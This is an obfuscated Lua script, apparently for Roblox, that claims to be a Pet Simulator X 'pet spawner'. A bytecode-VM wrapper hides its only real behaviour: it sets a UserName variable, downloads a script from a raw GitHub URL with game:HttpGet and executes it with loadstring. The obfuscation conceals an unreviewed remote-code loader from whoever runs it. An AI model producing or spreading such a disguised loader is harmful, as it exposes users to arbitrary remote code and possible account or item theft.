--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.17) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v67=v2(v0(v30,16));if v19 then local v77=v5(v67,v19);v19=nil;return v77;else return v67;end end end);local function v20(v31,v32,v33)if v33 then local v68=0 + 0 ;local v69;while true do if (v68==(0 -0)) then v69=(v31/((5 -3)^(v32-(1 -(0 + 0)))))%((4 -2)^(((v33-(620 -(555 + 15 + 49))) -(v32-1)) + (932 -(857 + 74)))) ;return v69-(v69%(1 -0)) ;end end else local v70=(1067 -(68 + 997))^(v32-(569 -(367 + 201))) ;return (((v31%(v70 + v70))>=v70) and (4 -3)) or ((1884 -(892 + 65)) -(214 + 713)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (4 -2) );v18=v18 + (3 -1) ;return (v36 * (469 -213)) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + 3 );v18=v18 + (955 -(802 + 150)) + 1 ;return (v40 * (16777566 -(87 + 263))) + (v39 * (48199 + 17337)) + (v38 * (436 -((180 -113) + 113))) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=1 -(0 -0) ;local v44=(v20(v42,1 + 0 ,1017 -(915 + 82) ) * (((435 -(44 + 386)) -3)^32)) + v41 ;local v45=v20(v42,21,19 + 12 );local v46=((v20(v42,(1527 -(998 + 488)) -9 )==(1188 -(1069 + 118))) and  -(2 -1)) or (1 -(0 + 0)) ;if (v45==0) then if (v44==(0 + (438 -(145 + 293)))) then return v46 * (0 -0) ;else v45=1 + 0 ;v43=791 -(368 + 423) ;end elseif (v45==((7205 -(201 + 571)) -4386)) then return ((v44==(18 -(10 + (1146 -(116 + 1022))))) and (v46 * ((3 -2)/(442 -(416 + 26))))) or (v46 * NaN) ;end return v8(v46,v45-(4258 -3235) ) * (v43 + (v44/((6 -4)^(23 + 18 + 11)))) ;end local function v25(v47)local v48;if  not v47 then v47=v23();if (v47==(0 -0)) then return "";end end v48=v3(v16,v18,(v18 + v47) -1 );v18=v18 + v47 ;local v49={};for v65=3 -2 , #v48 do v49[v65]=v2(v1(v3(v48,v65,v65)));end return v6(v49);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v50=0;local v51;local v52;local v53;local v54;local v55;local v56;local v57;while true do if ((377 -(123 + 251))~=v50) then else v57=nil;while true do local v78=0 -0 ;local v79;while true do if (v78==(698 -(208 + 490))) then v79=0;while true do if (v79==0) then if (v51==1) then local v101=0;while true do if (v101~=(0 + 0)) then else v55={v52,v53,nil,v54};v56=v23();v101=837 -(660 + 176) ;end if (v101~=(1 + 0)) then else v57={};v51=204 -(14 + 188) ;break;end end end if (v51==(678 -(534 + 141))) then local v102=0;local v103;while true do if (v102==(0 + 0)) then v103=0;while true do if (v103==(0 + 0)) then local v160=0 + 0 ;while true do if (v160==(0 -0)) then for v173=1 -0 ,v23() do v53[v173-1 ]=v28();end return v55;end end end end break;end end end v79=1;end if (1~=v79) then else if (v51==(0 -0)) then local v104=0;while true do if (v104~=(0 + 0)) then else v52={};v53={};v104=1 + 0 ;end if ((397 -(115 + 281))==v104) then v54={};v51=2 -1 ;break;end end end if (v51~=2) then else for v106=1,v56 do local v107=0;local v108;local v109;local v110;local v111;while true do if (v107==(2 + 0)) then while true do if (v108==(0 -0)) then local v163=0 -0 ;while true do if (v163==(867 -(550 + 317))) then v109=0;v110=nil;v163=1 -0 ;end if (v163~=(1 -0)) then else v108=1;break;end end end if (v108~=1) then else v111=nil;while true do if (v109==(0 -0)) then v110=v21();v111=nil;v109=1;end if (v109==(286 -(134 + 151))) then if (v110==(1666 -(970 + 695))) then v111=v21()~=(0 -0) ;elseif (v110==(1992 -(582 + 1408))) then v111=v24();elseif (v110==3) then v111=v25();end v57[v106]=v111;break;end end break;end end break;end if (0==v107) then v108=0 -0 ;v109=nil;v107=1 -0 ;end if (v107~=(3 -2)) then else v110=nil;v111=nil;v107=1826 -(1195 + 629) ;end end end v55[3]=v21();for v112=1,v23() do local v113=0 -0 ;local v114;local v115;while true do if (v113~=(242 -(187 + 54))) then else while true do if (v114~=0) then else v115=v21();if (v20(v115,1,1)==0) then local v169=0;local v170;local v171;local v172;while true do if ((781 -(162 + 618))~=v169) then else v172={v22(),v22(),nil,nil};if (v170==0) then local v179=0;local v180;while true do if (0==v179) then v180=0;while true do if (v180~=(0 -0)) then else v172[3]=v22();v172[4]=v22();break;end end break;end end elseif (v170==(1 -0)) then v172[3]=v23();elseif (v170==2) then v172[3]=v23() -(2^16) ;elseif (v170~=3) then else local v191=0;local v192;local v193;while true do if (v191==(0 + 0)) then v192=1636 -(1373 + 263) ;v193=nil;v191=1;end if (v191==1) then while true do if ((1000 -(451 + 549))~=v192) then else v193=0;while true do if (v193~=0) then else v172[1 + 2 ]=v23() -((2 -0)^(26 -10)) ;v172[1388 -(746 + 638) ]=v22();break;end end break;end end break;end end end v169=2;end if (v169~=0) then else v170=v20(v115,1 + 1 ,4 -1 );v171=v20(v115,4,347 -(218 + 123) );v169=1582 -(1535 + 46) ;end if (v169~=2) then else if (v20(v171,1,1)==1) then v172[2]=v57[v172[2 + 0 ]];end if (v20(v171,1 + 1 ,562 -(306 + 254) )~=1) then else v172[3]=v57[v172[1 + 2 ]];end v169=5 -2 ;end if (v169==3) then if (v20(v171,3,3)==(1468 -(899 + 568))) then v172[4]=v57[v172[3 + 1 ]];end v52[v112]=v172;break;end end end break;end end break;end if ((0 -0)~=v113) then else v114=603 -(268 + 335) ;v115=nil;v113=291 -(60 + 230) ;end end end v51=3;end break;end end break;end end end break;end if (v50==(573 -(426 + 146))) then local v71=0 + 0 ;while true do if (v71==(1457 -(282 + 1174))) then v50=2;break;end if (v71~=0) then else v53=nil;v54=nil;v71=812 -(569 + 242) ;end end end if (v50~=(5 -3)) then else local v72=0;while true do if (v72==(0 + 0)) then v55=nil;v56=nil;v72=1025 -(706 + 318) ;end if (v72==(1252 -(721 + 530))) then v50=3;break;end end end if (v50==0) then local v73=0;while true do if (v73==(1271 -(945 + 326))) then v51=0 -0 ;v52=nil;v73=1;end if (v73~=1) then else v50=1;break;end end end end end local function v29(v58,v59,v60)local v61=0;local v62;local v63;local v64;while true do if (v61==1) then v64=v58[3];return function(...)local v80=v62;local v81=v63;local v82=v64;local v83=v27;local v84=1;local v85= -1;local v86={};local v87={...};local v88=v12("#",...) -1 ;local v89={};local v90={};for v94=0,v88 do if (v94>=v82) then v86[v94-v82 ]=v87[v94 + 1 ];else v90[v94]=v87[v94 + 1 ];end end local v91=(v88-v82) + 1 ;local v92;local v93;while true do v92=v80[v84];v93=v92[1];if (v93<=10) then if (v93<=4) then if (v93<=1) then if (v93>0) then v90[v92[2]]=v92[3]~=0 ;else local v117=v92[2];local v118=v90[v92[3]];v90[v117 + 1 ]=v118;v90[v117]=v118[v92[4]];end elseif (v93<=2) then v84=v92[3];elseif (v93==3) then if ((v92[3]=="_ENV") or (v92[3]=="getfenv")) then v90[v92[2]]=v60;else v90[v92[2]]=v60[v92[3]];end else v84=v92[3];end elseif (v93<=7) then if (v93<=5) then local v123=v92[2];v90[v123]=v90[v123](v13(v90,v123 + 1 ,v85));elseif (v93>6) then local v130=0;local v131;local v132;local v133;local v134;while true do if (v130==1) then v85=(v133 + v131) -1 ;v134=0;v130=2;end if (v130==0) then v131=v92[2];v132,v133=v83(v90[v131](v13(v90,v131 + 1 ,v92[3])));v130=1;end if (v130==2) then for v164=v131,v85 do v134=v134 + 1 ;v90[v164]=v132[v134];end break;end end else local v135=v92[2];local v136=v90[v92[3]];v90[v135 + 1 ]=v136;v90[v135]=v136[v92[4]];end elseif (v93<=8) then v90[v92[2]]();elseif (v93==9) then if ((v92[3]=="_ENV") or (v92[3]=="getfenv")) then v90[v92[2]]=v60;else v90[v92[2]]=v60[v92[3]];end elseif (v90[v92[2]]==v92[4]) then v84=v84 + 1 ;else v84=v92[3];end elseif (v93<=15) then if (v93<=12) then if (v93>11) then v90[v92[2]]=v92[3];else do return;end end elseif (v93<=13) then if (v90[v92[2]]==v92[4]) then v84=v84 + 1 ;else v84=v92[3];end elseif (v93>14) then local v141=v92[2];v90[v141]=v90[v141](v13(v90,v141 + 1 ,v85));else v90[v92[2]]=v92[3]~=0 ;end elseif (v93<=18) then if (v93<=16) then v60[v92[3]]=v90[v92[2]];elseif (v93>17) then v90[v92[2]]=v92[3];else do return;end end elseif (v93<=19) then v90[v92[2]]();elseif (v93>20) then v60[v92[3]]=v90[v92[2]];else local v148=0;local v149;local v150;local v151;local v152;while true do if (v148==0) then v149=v92[2];v150,v151=v83(v90[v149](v13(v90,v149 + 1 ,v92[3])));v148=1;end if (v148==2) then for v167=v149,v85 do local v168=0;while true do if (v168==0) then v152=v152 + 1 ;v90[v167]=v150[v152];break;end end end break;end if (v148==1) then v85=(v151 + v149) -1 ;v152=0;v148=2;end end end v84=v84 + 1 ;end end;end if (v61==0) then v62=v58[1];v63=v58[2];v61=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365724E616D6503123O00594F555220555345524E414D452048455245030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034E3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7073787363726970746572772F7065726D6B2O652O7065742F6D61696E2F70657473696D78737061776E657200103O002O123O00013O00260D3O000100010001002O043O00010001002O12000100033O001210000100023O001203000100043O001203000200053O00202O000200020006002O12000400074O0001000500014O0014000200054O000500013O00022O0013000100010001002O043O000F0001002O043O000100012O000B3O00017O00",v9(),...);
